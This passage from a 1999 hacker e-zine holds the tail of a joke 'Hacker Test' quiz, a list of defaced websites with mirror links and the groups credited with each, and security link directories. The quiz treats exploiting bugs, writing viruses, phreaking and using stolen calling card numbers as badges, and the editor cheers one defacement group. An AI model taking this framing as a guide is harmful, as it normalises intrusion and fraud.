0x168 Do you know RFC-822 by heart? 10. 0x169 ... Can you recite all the errors in it? 11. 0x16A Have you written a Sendmail configuration file? 12. 0x16B ... Does it work? 13. 0x16C ... Do you mumble "defocus" in your sleep? 14. 0x16D Do you know the max packet lifetime? 15.Operating systems 1. 0x16E Can you use BSD Unix? 2. 0x16F ... non-BSD Unix? 3. 0x170 ... AIX 4. 0x171 ... VM/CMS? 5. 0x172 ... VMS? 6. 0x173 ... MVS? 7. 0x174 ... VSE? 8. 0x175 ... RSTS/E? 9. 0x176 ... CP/M? 10. 0x177 ... COS? 11. 0x178 ... NOS? 12. 0x179 ... CP-67? 13. 0x17A ... RT-11? 14. 0x17B ... MS-DOS? 15. 0x17C ... Finder? 16. 0x17D ... PRODOS? 17. 0x17E ... more than one OS for the TRS-80? 18. 0x17F ... Tops-10? 19. 0x180 ... 
Tops-20? 20. 0x181 ... OS-9? 21. 0x182 ... OS/2? 22. 0x183 ... AOS/VS? 23. 0x184 ... Multics? 24. 0x185 ... ITS? 25. 0x186 ... Vulcan? 26. 0x187 Have you ever paged or swapped off a tape drive? 27. 0x188 ... Off a card reader/punch? 28. 0x189 ... Off a teletype? 29. 0x18A ... Off a networked (non-local) disk? 30. 0x18B Have you ever found an operating system bug? 31. 0x18C ... Did you exploit it? 32. 0x18D ... Did you report it? 33. 0x18E ... Was your report ignored? 34. 0x18F Have you ever crashed a machine? 35. 0x190 ... Intentionally? 16.People 1. 0x191 Do you know fewer than three people? 2. 0x192 ... fewer than two? 3. 0x193 ... nobody at all? 17.Personal 1. 0x194 Are your shoelaces untied? 2. 0x195 Do you interface poorly with strangers? 3. 0x196 Are you able to recite phone numbers for half-a-dozen computer systems but unable to recite your own? 4. 0x197 Do you log in before breakfast? 5. 0x198 Do you consume more than LD-50 caffeine a day? 6. 0x199 Do you answer either-or questions with "yes"? 7. 0x19A Do you own an up-to-date copy of any operating system manual? 8. 0x19B ... *every* operating system manual? 9. 0x19C Do other people have difficulty using your customized environment? 10. 0x19D Do you dream in any programming languages? 11. 0x19E Do you have difficulty focusing on three-dimensional objects? 12. 0x19F Do you ignore mice? 13. 0x1A0 Do you despise the CAPS LOCK key? 14. 0x1A1 Do you believe menus belong in restaurants? 15. 0x1A2 Do you have a Mandelbrot hanging on your wall? 16. 0x1A3 Have you ever decorated with magnetic tape or punched cards? 17. 0x1A4 Do you have a disk platter or a naked floppy hanging in your home? 18. 0x1A5 Have you ever seen the dawn? 19. 0x1A6 ... Twice in a row? 20. 0x1A7 Do you use "foobar" in daily conversation? 21. 0x1A8 ... "bletch"? 22. 0x1A9 Do you use the "P convention"? 23. 0x1AA Do you automatically respond to any user question with RTFM? 24. 0x1AB ... Do you know what it means? 25. 
0x1AC Do you think garbage collection means memory management? 26. 0x1AD Do you have problems allocating horizontal space in your room/office? 27. 0x1AE Do you read Scientific American in bars to pick up women? 28. 0x1AF Is your license plate computer-related? 29. 0x1B0 Have you ever taken the Purity test? 30. 0x1B1 Ever have an out-of-CPU experience? 31. 0x1B2 Have you ever set up a blind date over the computer? 32. 0x1B3 Do you talk to the person next to you via computer? 18.Programming 1. 0x1B4 Can you write a Fortran compiler? 2. 0x1B5 ... In TECO? 3. 0x1B6 Can you read a machine dump? 4. 0x1B7 Can you disassemble code in your head? 5. 0x1B8 Have you ever written a compiler? 6. 0x1B9 ... an operating system? 7. 0x1BA ... a device driver? 8. 0x1BB ... a text processor? 9. 0x1BC ... a display hack? 10. 0x1BD ... a database system? 11. 0x1BE ... an expert system? 12. 0x1BF ... an edge detector? 13. 0x1C0 ... a real-time control system? 14. 0x1C1 ... an accounting package? 15. 0x1C2 ... a virus? 16. 0x1C3 ... a prophylactic? 17. 0x1C4 Have you ever written a biorhythm program? 18. 0x1C5 ... Did you sell the output? 19. 0x1C6 ... Was the output arbitrarily invented? 20. 0x1C7 Have you ever computed pi to more than a thousand decimal places? 21. 0x1C8 ... the number e? 22. 0x1C9 Ever find a prime number of more than a hundred digits? 23. 0x1CA Have you ever written self-modifying code? 24. 0x1CB ... Are you proud of it? 25. 0x1CC Did you ever write a program that ran correctly the first time? 26. 0x1CD ... Was it longer than 20 lines? 27. 0x1CE ... 100 lines? 28. 0x1CF ... Was it in assembly language? 29. 0x1D0 ... Did it work the second time? 30. 0x1D1 Can you solve the Towers of Hanoi recursively? 31. 0x1D2 ... Non-recursively? 32. 0x1D3 ... Using the Troff text formatter? 33. 0x1D4 Ever submit an entry to the Obfuscated C code contest? 34. 0x1D5 ... Did it win? 35. 0x1D6 ... Did your entry inspire a new rule? 36. 0x1D7 Do you know Duff's device? 37. 
0x1D8 Do you know Jensen's device? 38. 0x1D9 Ever spend ten minutes trying to find a single-character error? 39. 0x1DA ... More than an hour? 40. 0x1DB ... More than a day? 41. 0x1DC ... More than a week? 42. 0x1DD ... Did the first person you show it to find it immediately? 19.Unix 1. 0x1DE Can you use Berkeley Unix? 2. 0x1DF .. Non-Berkeley Unix? 3. 0x1E0 Can you distinguish between sections 4 and 5 of the Unix manual? 4. 0x1E1 Can you find TERMIO in the System V release 2 documentation? 5. 0x1E2 Have you ever mounted a tape as a Unix file system? 6. 0x1E3 Have you ever built Minix? 7. 0x1E4 Can you answer "quiz function ed-command" correctly? 8. 0x1E5 ... How about "quiz ed-command function"? 20.Usenet 1. 0x1E6 Do you read news? 2. 0x1E7 ... More than 32 newsgroups? 3. 0x1E8 ... More than 256 newsgroups? 4. 0x1E9 ... All the newsgroups? 5. 0x1EA Have you ever posted an article? 6. 0x1EB ... Do you post regularly? 7. 0x1EC Have you ever posted a flame? 8. 0x1ED ... Ever flame a cross-posting? 9. 0x1EE ... Ever flame a flame? 10. 0x1EF ... Do you flame regularly? 11. 0x1F0 Ever have your program posted to a source newsgroup? 12. 0x1F1 Ever forge a posting? 13. 0x1F2 Ever form a new newsgroup? 14. 0x1F3 ... Does it still exist? 15. 0x1F4 Ever delete a pre-existing newsgroup? Do you remember 16. 0x1F5 ... mod.ber? 17. 0x1F6 ... the Stupid People's Court? 18. 0x1F7 ... Bandy-grams? 21.Phreaking 1. 0x1F8 Have you ever built a black box? 2. 0x1F9 Can you name all of the 'colors' of boxes? 3. 0x1FA ... and their associated functions? 4. 0x1FB Does your touch tone phone have 16 DTMF buttons on it? 5. 0x1FC Did the breakup of MaBell create more opportunities for you? 6. 0x1FD Do you know 4 or more calling card numbers (not your own)? Scoring To determine your hacker purity, use the submit button at the bottom, or subtract the number of questions you answered yes to from 0x200. 
This gives you your hacker purity level (a measure of how un-corrupt you are in the hacker domain). Find your purity in this table:

0x000 and 0x016 -> Wizard
0x017 and 0x040 -> Guru
0x041 and 0x080 -> Hacker
0x081 and 0x0C0 -> Nerd
0x0C1 and 0x100 -> Operator
0x101 and 0x180 -> User
0x181 and 0x200 -> Computer Illiterate

If you don't understand the scoring part of the test, you should have just stopped at the beginning.

If you have any comments or suggestions regarding the HACKER TEST, please send them to one of these addresses:

hayes@psunuce.bitnet
jwh100@psuvm.bitnet
jwh100@psuvmxa.bitnet
jwh100@psuvm.psu.edu
jwh100@psuvmxa.psu.edu

Note: Any errors introduced by the conversion of this test to HTML are the fault of John DuBois, not the author mentioned above.

@HWA

SITE.1

You can Send in submissions for this section too if you've found a cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

contributed by InET - Media via HNN

Crackdown in Latin America?

We have heard a rumor about a possible conspiracy against Latin American technology enthusiasts by several intelligence organizations from various countries. Specifically the rumor mentions the capture of 50 "hackers" in Colombia and others in Latin America. If somebody has more information, please let us know.
contact@hackernews.com
cc:hwa@press.usmc.net

Latest cracked pages courtesy of attrition.org

Defaced: http://www.legions.org (Legions of the Underground)
By: 430
Mirror: http://www.attrition.org/mirror/attrition/1999/09/04/www.legions.org
OS: Linux

Defaced: http://www.linuxhq.org (Linux Headquarters)
By: Level Seven
Mirror: http://www.attrition.org/mirror/attrition/1999/09/05/www.linuxhq.org/
OS: Linux

Defaced: http://www.c-span.org (C-Span)
By: United Loan Gunmen
Mirror: http://www.attrition.org/mirror/attrition/1999/09/05/www.c-span.org
OS: NT
This is the Web site of the Cable channel C-Span. The ULG also defaced the ABC Network last month.

Defaced: http://www.cityofcairns.qld.gov.au
By: Unknown
Mirror: http://www.attrition.org/mirror/attrition/1999/09/06/www.cityofcairns.qld.gov.au/
OS: NT

Defaced: http://www.sheraton.com (Sheraton Hotels)
By: Level Seven Crew
Mirror: http://www.attrition.org/mirror/attrition/1999/09/06/www.sheraton.com/
OS: Solaris

Defaced: http://www.usembassy-china.gov (US Embassy in China)
By: Level Seven Crew
Mirror: http://www.attrition.org/mirror/attrition/1999/09/07/www.usembassy-china.gov
OS: Solaris

South Coast Area Network (www.coos.or.us)
Cell Talk Accessories (www.celltalkaccessories.com)
Statistics South Africa (www.statssa.gov.za)
US Embassy in China (Chinese Server) (www.usembassy-china.org.cn)
MTV Asia (mtvasia.com)
Club Search (www.clubsearch.co.uk)
Malaysian Science and Technology Information Centre (www.mastic.gov.my)
Architectural Concepts Online (www.arconcepts.com)
Strategic Information Solutions, Inc. (www.sis.net)
1499 (www.1499.com)
Adult Free Pics (www.adultfreepics.com)
Home Organization for Money Management (www.homm.org)
NetCom GmbH (www.netcom.ch)
Graduate School of Public Policy Studies, U. of Chicago (www.harrisschool.uchicago.edu)
InfoHype (infohype.11net.com)
Desert Winds High School (www.dwhs.org)
Harley-Davidson Parts and Clubs (www.hogs.com)
123 Inc. (www.123inc.com)
The Open University (www.open.ac.uk)
Iptek Indonesia (webprimus.iptek.net.id)
Oz Online (www.ozonline.com.au)
InterDiscount Switzerland (www.interdiscount.ch)
NASA JPL Quality Assurance Engineering (qa-web.jpl.nasa.gov)
Government of Brazil (www.brasil.gov.br)
Sex Creations (www.sexcreations.com)

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it.
@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]